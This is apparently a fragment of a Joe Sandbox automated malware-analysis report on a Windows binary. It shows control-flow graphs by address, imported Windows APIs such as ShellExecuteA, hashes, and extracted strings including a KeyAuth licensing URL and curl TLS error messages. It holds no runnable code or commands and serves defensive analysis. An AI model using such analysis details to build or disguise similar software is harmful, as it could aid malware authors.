_invalid_parameter_noinfo_noreturn 1046->1052 1047->1039 1065 7ff7e59e2e60-7ff7e59e2e98 call 7ff7e59e4bd0 call 7ff7e59e48c0 1048->1065 1056 7ff7e59e2e24-7ff7e59e2e29 call 7ff7e5a3f1f0 1049->1056 1057 7ff7e59e2e2b 1049->1057 1050->1003 1055 7ff7e59e2dfa-7ff7e59e2e08 call 7ff7e5a3f1f0 1050->1055 1052->1047 1066 7ff7e59e2e18-7ff7e59e2e1e _invalid_parameter_noinfo_noreturn 1055->1066 1067 7ff7e59e2e0a-7ff7e59e2e16 1055->1067 1061 7ff7e59e2e2e-7ff7e59e2e3d memcpy 1056->1061 1057->1061 1061->1048 1072 7ff7e59e2fa3-7ff7e59e3013 call 7ff7e59e48c0 call 7ff7e5a3f1f0 call 7ff7e59e4310 call 7ff7e59e5a00 call 7ff7e59e3e50 1065->1072 1073 7ff7e59e2e9e-7ff7e59e2ead call 7ff7e59e48c0 1065->1073 1066->1049 1067->1061 1101 7ff7e59e3015-7ff7e59e3060 call 7ff7e59e48c0 call 7ff7e59e49a0 call 7ff7e59e3b10 ShellExecuteA exit 1072->1101 1102 7ff7e59e3061-7ff7e59e30a7 call 7ff7e59e48c0 call 7ff7e59e4d00 call 7ff7e59e3b10 MessageBoxA call 7ff7e59e3cd0 exit 1072->1102 1079 7ff7e59e2eb5 1073->1079 1080 7ff7e59e2eaf-7ff7e59e2eb3 1073->1080 1082 7ff7e59e2eb8-7ff7e59e2ec1 1079->1082 1080->1082 1084 7ff7e59e2ec3 1082->1084 1085 7ff7e59e2ec6-7ff7e59e2ee9 call 7ff7e59e4310 call 7ff7e59e3e50 1082->1085 1084->1085 1094 7ff7e59e2f1f-7ff7e59e2f33 1085->1094 1095 7ff7e59e2eeb-7ff7e59e2efc 1085->1095 1099 7ff7e59e2f35-7ff7e59e2f43 1094->1099 1100 7ff7e59e2f69-7ff7e59e2fa2 call 7ff7e5a3f580 1094->1100 1097 7ff7e59e2efe-7ff7e59e2f11 1095->1097 1098 7ff7e59e2f1a call 7ff7e5a3f22c 1095->1098 1097->1098 1105 7ff7e59e2f13-7ff7e59e2f19 _invalid_parameter_noinfo_noreturn 1097->1105 1098->1094 1107 7ff7e59e2f45-7ff7e59e2f58 1099->1107 1108 7ff7e59e2f61-7ff7e59e2f64 call 7ff7e5a3f22c 1099->1108 1101->1102 1102->998 1105->1098 1107->1108 1112 7ff7e59e2f5a-7ff7e59e2f60 _invalid_parameter_noinfo_noreturn 1107->1112 1108->1100 1112->1108
                                            APIs
                                              • Part of subcall function 00007FF7E59E2840: system.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7E59E28A7
                                              • Part of subcall function 00007FF7E59E2840: system.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7E59E2917
                                              • Part of subcall function 00007FF7E59E2840: system.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7E59E2977
                                              • Part of subcall function 00007FF7E59E2840: system.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7E59E29C7
                                              • Part of subcall function 00007FF7E59E2840: system.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7E59E2A17
                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7E59E2C48
                                              • Part of subcall function 00007FF7E59E48C0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7E59E4980
                                              • Part of subcall function 00007FF7E5A3F1F0: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,-3333333333333333,00007FF7E59E43EE,7FFFFFFFFFFFFFFF,https://keyauth.win/api/1.2/,-3333333333333333,00007FF7E59E1B49), ref: 00007FF7E5A3F20A
                                              • Part of subcall function 00007FF7E59E4310: memcpy.VCRUNTIME140(7FFFFFFFFFFFFFFF,https://keyauth.win/api/1.2/,-3333333333333333,00007FF7E59E1B49), ref: 00007FF7E59E4341
                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7E59E2C98
                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7E59E2CD7
                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7E59E2D25
                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7E59E2D64
                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7E59E2E18
                                            • memcpy.VCRUNTIME140 ref: 00007FF7E59E2E3D
                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7E59E2F13
                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7E59E2F5A
                                            • ShellExecuteA.SHELL32 ref: 00007FF7E59E3052
                                            • exit.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7E59E305A
                                            • MessageBoxA.USER32 ref: 00007FF7E59E3090
                                            • exit.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7E59E30A1
                                            • Sleep.KERNEL32 ref: 00007FF7E59E3109
                                            • exit.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7E59E3111
                                            • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7E59E3118
                                              • Part of subcall function 00007FF7E59E3160: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7E59E326F
                                              • Part of subcall function 00007FF7E59E3160: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7E59E32B0
                                              • Part of subcall function 00007FF7E59E3C30: memcpy.VCRUNTIME140 ref: 00007FF7E59E3C83
                                              • Part of subcall function 00007FF7E59E32D0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7E59E33B0
                                              • Part of subcall function 00007FF7E59E33D0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7E59E34B0
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: _invalid_parameter_noinfo_noreturn$system$exitmemcpy$Concurrency::cancel_current_taskExecuteMessageShellSleepmalloc
                                            • String ID: Failure$download$invalidver$message$open$sessionid$success
                                            • API String ID: 3283070336-3881042241
                                            • Opcode ID: 1e7466b00c29e06c08f4ea5f87bbe137f5503f3082a7dc0f4c96e7eef9db421e
                                            • Instruction ID: dc444fb0d285cca5dfc0fabb0fae644670bf02ab609d5703a97ff4556d686490
                                            • Opcode Fuzzy Hash: 1e7466b00c29e06c08f4ea5f87bbe137f5503f3082a7dc0f4c96e7eef9db421e
                                            • Instruction Fuzzy Hash: A502E662A0CB8A85EB00EB64E4543EDA7A1FF45B98F805236DA5D87BD5DF3CE084C351

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1125 7ff7e5a1b5c0-7ff7e5a1b63d 1126 7ff7e5a1b65e-7ff7e5a1b663 1125->1126 1127 7ff7e5a1b63f-7ff7e5a1b643 1125->1127 1128 7ff7e5a1b682-7ff7e5a1b686 1126->1128 1129 7ff7e5a1b665-7ff7e5a1b67d call 7ff7e5a05af0 1126->1129 1127->1126 1130 7ff7e5a1b645-7ff7e5a1b659 call 7ff7e5a05af0 1127->1130 1132 7ff7e5a1b688-7ff7e5a1b69c call 7ff7e5a05af0 1128->1132 1133 7ff7e5a1b6a1-7ff7e5a1b6a4 1128->1133 1141 7ff7e5a1baa3-7ff7e5a1baa6 1129->1141 1140 7ff7e5a1baac-7ff7e5a1bab9 1130->1140 1132->1141 1137 7ff7e5a1b9ba 1133->1137 1138 7ff7e5a1b6aa-7ff7e5a1b6ae 1133->1138 1146 7ff7e5a1b9c2-7ff7e5a1b9ca 1137->1146 1138->1137 1143 7ff7e5a1b6b4-7ff7e5a1b6c9 1138->1143 1144 7ff7e5a1bbc5-7ff7e5a1bbcb 1140->1144 1145 7ff7e5a1babf-7ff7e5a1bac3 1140->1145 1141->1140 1141->1144 1147 7ff7e5a1b6cb-7ff7e5a1b6ce 1143->1147 1148 7ff7e5a1b6d0-7ff7e5a1b6fb realloc 1143->1148 1150 7ff7e5a1bbdd-7ff7e5a1bbf3 1144->1150 1151 7ff7e5a1bbcd-7ff7e5a1bbd0 1144->1151 1145->1144 1149 7ff7e5a1bac9-7ff7e5a1bacd 1145->1149 1152 7ff7e5a1b9ce 1146->1152 1147->1148 1153 7ff7e5a1b74d-7ff7e5a1b762 call 7ff7e5a05cf0 1147->1153 1154 7ff7e5a1b71e-7ff7e5a1b74b 1148->1154 1155 7ff7e5a1b6fd-7ff7e5a1b719 call 7ff7e5a05970 1148->1155 1149->1144 1157 7ff7e5a1bad3-7ff7e5a1bae8 call 7ff7e5a08800 1149->1157 1160 7ff7e5a1bc3b-7ff7e5a1bc41 1150->1160 1161 7ff7e5a1bbf5-7ff7e5a1bc39 memcpy * 2 1150->1161 1151->1150 1158 7ff7e5a1bbd2-7ff7e5a1bbda 1151->1158 1159 7ff7e5a1b9d6-7ff7e5a1b9dc 1152->1159 1165 7ff7e5a1b767-7ff7e5a1b76d 1153->1165 1154->1153 1155->1140 1185 7ff7e5a1bbae-7ff7e5a1bbc0 call 7ff7e5a05af0 1157->1185 1186 7ff7e5a1baee-7ff7e5a1baf0 1157->1186 1158->1150 1167 7ff7e5a1ba72-7ff7e5a1ba78 1159->1167 1168 7ff7e5a1b9e2-7ff7e5a1b9f7 call 7ff7e5a05af0 1159->1168 1163 7ff7e5a1bc43-7ff7e5a1bc46 1160->1163 1164 7ff7e5a1bc55-7ff7e5a1bc58 1160->1164 1169 7ff7e5a1bc65-7ff7e5a1bc87 call 7ff7e5a3f580 1161->1169 1163->1164 1171 7ff7e5a1bc48-7ff7e5a1bc50 1163->1171 1172 7ff7e5a1bc5a-7ff7e5a1bc5e 1164->1172 1173 7ff7e5a1bc60-7ff7e5a1bc62 1164->1173 1174 7ff7e5a1b972-7ff7e5a1b97a 1165->1174 1175 7ff7e5a1b773-7ff7e5a1b77f 1165->1175 1178 7ff7e5a1ba7e-7ff7e5a1ba8e 1167->1178 1179 7ff7e5a1b7a0-7ff7e5a1b7af 1167->1179 1191 7ff7e5a1b9f9-7ff7e5a1b9fc 1168->1191 1192 7ff7e5a1ba02-7ff7e5a1ba12 1168->1192 1171->1164 1172->1173 1173->1169 1181 7ff7e5a1b97c-7ff7e5a1b98d 1174->1181 1182 7ff7e5a1b992 1174->1182 1183 7ff7e5a1b799-7ff7e5a1b79e 1175->1183 1184 7ff7e5a1b781-7ff7e5a1b787 1175->1184 1178->1141 1189 7ff7e5a1ba90-7ff7e5a1ba94 1178->1189 1179->1141 1188 7ff7e5a1b7b5-7ff7e5a1b7b7 1179->1188 1181->1179 1182->1183 1195 7ff7e5a1b998-7ff7e5a1b9b5 1182->1195 1183->1179 1193 7ff7e5a1b95e-7ff7e5a1b96d call 7ff7e5a05af0 1184->1193 1194 7ff7e5a1b78d-7ff7e5a1b794 call 7ff7e5a05af0 1184->1194 1185->1144 1186->1185 1196 7ff7e5a1baf6-7ff7e5a1bb02 1186->1196 1188->1141 1198 7ff7e5a1b7bd-7ff7e5a1b7c0 1188->1198 1199 7ff7e5a1ba9b 1189->1199 1191->1192 1200 7ff7e5a1bb82-7ff7e5a1bb89 1191->1200 1201 7ff7e5a1ba18-7ff7e5a1ba59 call 7ff7e5a05af0 call 7ff7e5a19a80 1192->1201 1202 7ff7e5a1bb9a-7ff7e5a1bba9 1192->1202 1193->1183 1194->1183 1195->1179 1196->1144 1205 7ff7e5a1b7d2-7ff7e5a1b850 call 7ff7e5a083c0 1198->1205 1206 7ff7e5a1b7c2-7ff7e5a1b7c6 1198->1206 1207 7ff7e5a1ba9e call 7ff7e5a05af0 1199->1207 1200->1199 1220 7ff7e5a1bb8e-7ff7e5a1bb95 1201->1220 1221 7ff7e5a1ba5f-7ff7e5a1ba6d call 7ff7e5a05af0 1201->1221 1202->1207 1218 7ff7e5a1b852-7ff7e5a1b857 1205->1218 1219 7ff7e5a1b864-7ff7e5a1b869 1205->1219 1206->1205 1210 7ff7e5a1b7c8-7ff7e5a1b7cc 1206->1210 1207->1141 1210->1141 1210->1205 1218->1219 1222 7ff7e5a1b859-7ff7e5a1b85e 1218->1222 1223 7ff7e5a1b90e-7ff7e5a1b912 1219->1223 1224 7ff7e5a1b86f-7ff7e5a1b899 1219->1224 1220->1207 1221->1179 1222->1219 1226 7ff7e5a1bb07-7ff7e5a1bb0d 1222->1226 1223->1146 1230 7ff7e5a1b918-7ff7e5a1b91d 1223->1230 1227 7ff7e5a1b89b-7ff7e5a1b89e 1224->1227 1228 7ff7e5a1b8a0-7ff7e5a1b8bb realloc 1224->1228 1234 7ff7e5a1bb0f-7ff7e5a1bb20 1226->1234 1235 7ff7e5a1bb36-7ff7e5a1bb61 call 7ff7e59f1d10 call 7ff7e5a05af0 1226->1235 1227->1228 1231 7ff7e5a1b8e5-7ff7e5a1b8e9 1227->1231 1232 7ff7e5a1b8c1-7ff7e5a1b8e1 1228->1232 1233 7ff7e5a1bb66-7ff7e5a1bb7d call 7ff7e5a05970 1228->1233 1230->1146 1236 7ff7e5a1b923-7ff7e5a1b935 1230->1236 1239 7ff7e5a1b90c 1231->1239 1240 7ff7e5a1b8eb-7ff7e5a1b908 memcpy 1231->1240 1232->1231 1233->1141 1241 7ff7e5a1bb2a-7ff7e5a1bb31 1234->1241 1242 7ff7e5a1bb22 1234->1242 1235->1141 1236->1159 1237 7ff7e5a1b93b-7ff7e5a1b95c memcpy 1236->1237 1237->1152 1239->1223 1240->1239 1241->1199 1242->1241
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: memcpy
                                            • String ID: schannel: Curl_read_plain returned CURLE_RECV_ERROR$schannel: Curl_read_plain returned error %d$schannel: SSL/TLS connection renegotiated$schannel: an unrecoverable error occurred in a prior call$schannel: can't renogotiate, an error is pending$schannel: can't renogotiate, encrypted data available$schannel: enough decrypted data is already available$schannel: failed to decrypt data, need more data$schannel: failed to read data from server: %s$schannel: remote party requests renegotiation$schannel: renegotiating SSL/TLS connection$schannel: renegotiation failed$schannel: server closed abruptly (missing close_notify)$schannel: server closed the connection$schannel: server indicated shutdown in a prior call$schannel: unable to re-allocate memory
                                            • API String ID: 3510742995-857957974
                                            • Opcode ID: 507de865ae20c84d9630f303409964dba77a077305b430b96329f337efb5b13c
                                            • Instruction ID: b489abd76f63ca195fa9e6c4e9bbcb3b2708ad613f5d4400742f39c0e39342de
                                            • Opcode Fuzzy Hash: 507de865ae20c84d9630f303409964dba77a077305b430b96329f337efb5b13c
                                            • Instruction Fuzzy Hash: EF0200B2B08A8E85EB10EB19E5A4B69ABA4FF44F94F904537CA4DC3790DF78D441C712

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1368 7ff7e5a1aa50-7ff7e5a1aabe 1369 7ff7e5a1aae0 1368->1369 1370 7ff7e5a1aac0-7ff7e5a1aad5 1368->1370 1372 7ff7e5a1aae7-7ff7e5a1ab01 1369->1372 1370->1369 1371 7ff7e5a1aad7-7ff7e5a1aade 1370->1371 1371->1372 1373 7ff7e5a1ab07-7ff7e5a1ab0c 1372->1373 1374 7ff7e5a1b1cb 1372->1374 1373->1374 1375 7ff7e5a1ab12-7ff7e5a1ab20 1373->1375 1376 7ff7e5a1ab62-7ff7e5a1ab66 1375->1376 1377 7ff7e5a1ab22-7ff7e5a1ab5c malloc 1375->1377 1379 7ff7e5a1ab68-7ff7e5a1abad malloc 1376->1379 1380 7ff7e5a1abb3-7ff7e5a1abc4 1376->1380 1377->1376 1378 7ff7e5a1b1bf 1377->1378 1378->1374 1379->1378 1379->1380 1381 7ff7e5a1ac38-7ff7e5a1ac3a 1380->1381 1382 7ff7e5a1abc6-7ff7e5a1abe0 realloc 1380->1382 1385 7ff7e5a1ac9a-7ff7e5a1ad41 call 7ff7e5a083c0 malloc 1381->1385 1386 7ff7e5a1ac3c-7ff7e5a1ac60 call 7ff7e5a05cf0 1381->1386 1383 7ff7e5a1ac20-7ff7e5a1ac36 1382->1383 1384 7ff7e5a1abe2-7ff7e5a1abec call 7ff7e5a05970 1382->1384 1383->1381 1391 7ff7e5a1abf1 1384->1391 1385->1378 1393 7ff7e5a1ad47-7ff7e5a1ad61 memcpy 1385->1393 1392 7ff7e5a1ac65-7ff7e5a1ac68 1386->1392 1394 7ff7e5a1abf6-7ff7e5a1ac1f call 7ff7e5a3f580 1391->1394 1395 7ff7e5a1ac6e-7ff7e5a1ac70 1392->1395 1396 7ff7e5a1aedf-7ff7e5a1aee6 1392->1396 1393->1391 1401 7ff7e5a1ad67-7ff7e5a1add3 free 1393->1401 1397 7ff7e5a1aec6-7ff7e5a1aeda call 7ff7e5a05970 1395->1397 1398 7ff7e5a1ac76-7ff7e5a1ac7e 1395->1398 1399 7ff7e5a1b1b8-7ff7e5a1b1ba 1396->1399 1400 7ff7e5a1aeec-7ff7e5a1aef8 1396->1400 1397->1394 1398->1397 1403 7ff7e5a1ac84-7ff7e5a1ac96 1398->1403 1399->1394 1400->1394 1408 7ff7e5a1add9-7ff7e5a1ade0 1401->1408 1409 7ff7e5a1b1a3-7ff7e5a1b1aa 1401->1409 1403->1385 1411 7ff7e5a1b14c-7ff7e5a1b158 1408->1411 1412 7ff7e5a1ade6-7ff7e5a1aded 1408->1412 1410 7ff7e5a1b1ae 1409->1410 1410->1399 1415 7ff7e5a1b15a-7ff7e5a1b186 call 7ff7e59f1d10 call 7ff7e5a05970 1411->1415 1416 7ff7e5a1b18b-7ff7e5a1b19e 1411->1416 1413 7ff7e5a1adf8-7ff7e5a1adff 1412->1413 1414 7ff7e5a1adef-7ff7e5a1adf2 1412->1414 1419 7ff7e5a1ae00-7ff7e5a1ae04 1413->1419 1414->1413 1418 7ff7e5a1aefd-7ff7e5a1af04 1414->1418 1415->1394 1416->1394 1421 7ff7e5a1af44-7ff7e5a1af6d call 7ff7e59f1d10 call 7ff7e5a05970 1418->1421 1422 7ff7e5a1af06-7ff7e5a1af0d 1418->1422 1423 7ff7e5a1ae43-7ff7e5a1ae4a 1419->1423 1424 7ff7e5a1ae06-7ff7e5a1ae0a 1419->1424 1421->1391 1422->1415 1426 7ff7e5a1af13-7ff7e5a1af3f call 7ff7e59f1d10 call 7ff7e5a05970 1422->1426 1427 7ff7e5a1ae59-7ff7e5a1ae62 1423->1427 1428 7ff7e5a1ae4c 1423->1428 1424->1423 1430 7ff7e5a1ae0c-7ff7e5a1ae27 call 7ff7e5a06230 1424->1430 1426->1394 1427->1419 1434 7ff7e5a1ae64-7ff7e5a1ae68 1427->1434 1428->1427 1436 7ff7e5a1ae2c-7ff7e5a1ae32 1430->1436 1438 7ff7e5a1af98-7ff7e5a1af9f 1434->1438 1439 7ff7e5a1ae6e-7ff7e5a1ae73 1434->1439 1441 7ff7e5a1ae38-7ff7e5a1ae3d 1436->1441 1442 7ff7e5a1af72-7ff7e5a1af93 call 7ff7e5a05970 1436->1442 1443 7ff7e5a1afa7-7ff7e5a1afae 1438->1443 1439->1438 1445 7ff7e5a1ae79-7ff7e5a1ae8a 1439->1445 1441->1423 1441->1442 1442->1394 1443->1410 1447 7ff7e5a1afb4-7ff7e5a1afb7 1443->1447 1445->1443 1449 7ff7e5a1ae90-7ff7e5a1aeb4 memcpy 1445->1449 1452 7ff7e5a1afb9 1447->1452 1453 7ff7e5a1afc3-7ff7e5a1afcb 1447->1453 1449->1447 1454 7ff7e5a1aeba-7ff7e5a1aebf 1449->1454 1452->1453 1455 7ff7e5a1afcd-7ff7e5a1afe7 1453->1455 1456 7ff7e5a1aff3 1453->1456 1454->1397 1455->1456 1457 7ff7e5a1afe9-7ff7e5a1aff1 1455->1457 1458 7ff7e5a1affb-7ff7e5a1affe 1456->1458 1457->1458 1459 7ff7e5a1b120-7ff7e5a1b128 1458->1459 1460 7ff7e5a1b004-7ff7e5a1b035 1458->1460 1459->1399 1461 7ff7e5a1b12e-7ff7e5a1b139 1459->1461 1465 7ff7e5a1b03b-7ff7e5a1b043 1460->1465 1466 7ff7e5a1b0f3-7ff7e5a1b11e call 7ff7e59f1d10 call 7ff7e5a05970 1460->1466 1461->1399 1462 7ff7e5a1b13b-7ff7e5a1b147 call 7ff7e5a35ad0 1461->1462 1462->1394 1465->1466 1469 7ff7e5a1b049-7ff7e5a1b04c 1465->1469 1472 7ff7e5a1b0c5-7ff7e5a1b0c8 1466->1472 1471 7ff7e5a1b04e-7ff7e5a1b055 1469->1471 1469->1472 1473 7ff7e5a1b057-7ff7e5a1b07e memset call 7ff7e5a384b0 1471->1473 1474 7ff7e5a1b0c0 1471->1474 1476 7ff7e5a1b0ca CertFreeCertificateContext 1472->1476 1477 7ff7e5a1b0d0-7ff7e5a1b0d2 1472->1477 1484 7ff7e5a1b0bb 1473->1484 1485 7ff7e5a1b080-7ff7e5a1b08a 1473->1485 1474->1472 1476->1477 1477->1459 1478 7ff7e5a1b0d4-7ff7e5a1b0e5 call 7ff7e5a05970 1477->1478 1478->1394 1484->1474 1486 7ff7e5a1b0ea-7ff7e5a1b0f1 1485->1486 1487 7ff7e5a1b08c-7ff7e5a1b096 1485->1487 1488 7ff7e5a1b0b3-7ff7e5a1b0b6 call 7ff7e5a05970 1486->1488 1487->1486 1489 7ff7e5a1b098-7ff7e5a1b0aa call 7ff7e59ff0e0 1487->1489 1488->1484 1489->1484 1493 7ff7e5a1b0ac 1489->1493 1493->1488
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: malloc$memcpy$CertCertificateContextFreefreememsetrealloc
                                            • String ID: SSL: failed retrieving public key from server certificate$SSL: public key does not match pinned public key!$schannel: Failed to read remote certificate context: %s$schannel: SNI or certificate check failed: %s$schannel: failed to receive handshake, SSL/TLS connection failed$schannel: failed to send next handshake data: sent %zd of %lu bytes$schannel: next InitializeSecurityContext failed: %s$schannel: unable to allocate memory$schannel: unable to re-allocate memory
                                            • API String ID: 860210379-3059304359
                                            • Opcode ID: c9e05a40f0cb92ecf249dafa461975e93a9a3ec0d6669a3a129753aa29b99d16
                                            • Instruction ID: 3819590129aa4337ce60f736e5e11a097eb73faa9ab2cad87202300f77b37b88
                                            • Opcode Fuzzy Hash: c9e05a40f0cb92ecf249dafa461975e93a9a3ec0d6669a3a129753aa29b99d16
                                            • Instruction Fuzzy Hash: 6D129F72708B8A85EB60AF29D964BAAABA0FF44F84F904137CA5D87790DF38D441C751

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1494 7ff7e5a19c70-7ff7e5a19ce0 1495 7ff7e5a19cff 1494->1495 1496 7ff7e5a19ce2-7ff7e5a19cf4 1494->1496 1498 7ff7e5a19d06-7ff7e5a19d20 call 7ff7e5a08800 1495->1498 1496->1495 1497 7ff7e5a19cf6-7ff7e5a19cfd 1496->1497 1497->1498 1501 7ff7e5a19d22-7ff7e5a19d2c call 7ff7e5a05af0 1498->1501 1502 7ff7e5a19d31-7ff7e5a19d38 1498->1502 1501->1502 1504 7ff7e5a19d78 1502->1504 1505 7ff7e5a19d3a-7ff7e5a19d5a GetModuleHandleA GetProcAddress 1502->1505 1506 7ff7e5a19d7a-7ff7e5a19d8b 1504->1506 1505->1504 1507 7ff7e5a19d5c-7ff7e5a19d72 call 7ff7e5a08800 1505->1507 1508 7ff7e5a19d8d-7ff7e5a19da5 1506->1508 1509 7ff7e5a19db0 1506->1509 1507->1504 1514 7ff7e5a19d74-7ff7e5a19d76 1507->1514 1508->1509 1512 7ff7e5a19da7-7ff7e5a19dae 1508->1512 1513 7ff7e5a19db7-7ff7e5a19dba 1509->1513 1512->1513 1515 7ff7e5a19dbc-7ff7e5a19dd3 call 7ff7e5a08800 1513->1515 1516 7ff7e5a19dfb-7ff7e5a19e02 1513->1516 1514->1506 1524 7ff7e5a19de2-7ff7e5a19df6 call 7ff7e5a05970 1515->1524 1525 7ff7e5a19dd5-7ff7e5a19de0 1515->1525 1517 7ff7e5a19e06-7ff7e5a19e17 1516->1517 1519 7ff7e5a19e19-7ff7e5a19e31 1517->1519 1520 7ff7e5a19e3c 1517->1520 1519->1520 1522 7ff7e5a19e33-7ff7e5a19e3a 1519->1522 1523 7ff7e5a19e43-7ff7e5a19e45 1520->1523 1522->1523 1526 7ff7e5a19e88-7ff7e5a19e92 1523->1526 1527 7ff7e5a19e47-7ff7e5a19e63 call 7ff7e5a00360 call 7ff7e59ffd80 1523->1527 1537 7ff7e5a1a9fd-7ff7e5a1aa26 call 7ff7e5a3f580 1524->1537 1525->1517 1530 7ff7e5a19e98-7ff7e5a19ec3 1526->1530 1531 7ff7e5a1a707-7ff7e5a1a71e call 7ff7e5a17900 1526->1531 1556 7ff7e5a19e80-7ff7e5a19e83 call 7ff7e5a00390 1527->1556 1557 7ff7e5a19e65-7ff7e5a19e7d 1527->1557 1534 7ff7e5a19efb 1530->1534 1535 7ff7e5a19ec5-7ff7e5a19edc 1530->1535 1544 7ff7e5a1a720-7ff7e5a1a731 call 7ff7e5a17900 1531->1544 1545 7ff7e5a1a733-7ff7e5a1a73d call 7ff7e5a05af0 1531->1545 1541 7ff7e5a19f00-7ff7e5a19f0a 1534->1541 1538 7ff7e5a19ede-7ff7e5a19ee3 1535->1538 1539 7ff7e5a19ee5-7ff7e5a19eec 1535->1539 1538->1541 1546 7ff7e5a19eee-7ff7e5a19ef3 1539->1546 1547 7ff7e5a19ef5-7ff7e5a19ef9 1539->1547 1548 7ff7e5a19f0c-7ff7e5a19f0f 1541->1548 1549 7ff7e5a19f12-7ff7e5a19f1d 1541->1549 1544->1545 1559 7ff7e5a1a742-7ff7e5a1a74d 1544->1559 1545->1559 1546->1541 1547->1541 1548->1549 1554 7ff7e5a1a6ef-7ff7e5a1a6fe call 7ff7e5a05970 1549->1554 1555 7ff7e5a19f23-7ff7e5a19f38 1549->1555 1554->1531 1567 7ff7e5a1a9f8 1554->1567 1555->1554 1556->1526 1557->1556 1562 7ff7e5a1a753-7ff7e5a1a7d4 call 7ff7e5a05af0 call 7ff7e5a08380 1559->1562 1563 7ff7e5a1a7d6-7ff7e5a1a7e8 1559->1563 1566 7ff7e5a1a7ed-7ff7e5a1a845 calloc 1562->1566 1563->1566 1569 7ff7e5a1a847-7ff7e5a1a851 call 7ff7e5a05970 1566->1569 1570 7ff7e5a1a860-7ff7e5a1a863 1566->1570 1567->1537 1571 7ff7e5a1a856-7ff7e5a1a85b 1569->1571 1570->1571 1572 7ff7e5a1a865-7ff7e5a1a8c3 1570->1572 1571->1537 1577 7ff7e5a1a8c9-7ff7e5a1a8f8 free 1572->1577 1578 7ff7e5a1a96c-7ff7e5a1a988 call 7ff7e5a06230 1572->1578 1579 7ff7e5a1a8fa-7ff7e5a1a900 1577->1579 1580 7ff7e5a1a946-7ff7e5a1a967 call 7ff7e59f1d10 call 7ff7e5a05970 1577->1580 1585 7ff7e5a1a98d-7ff7e5a1a9aa 1578->1585 1583 7ff7e5a1a920-7ff7e5a1a941 call 7ff7e59f1d10 call 7ff7e5a05970 1579->1583 1584 7ff7e5a1a902-7ff7e5a1a91b 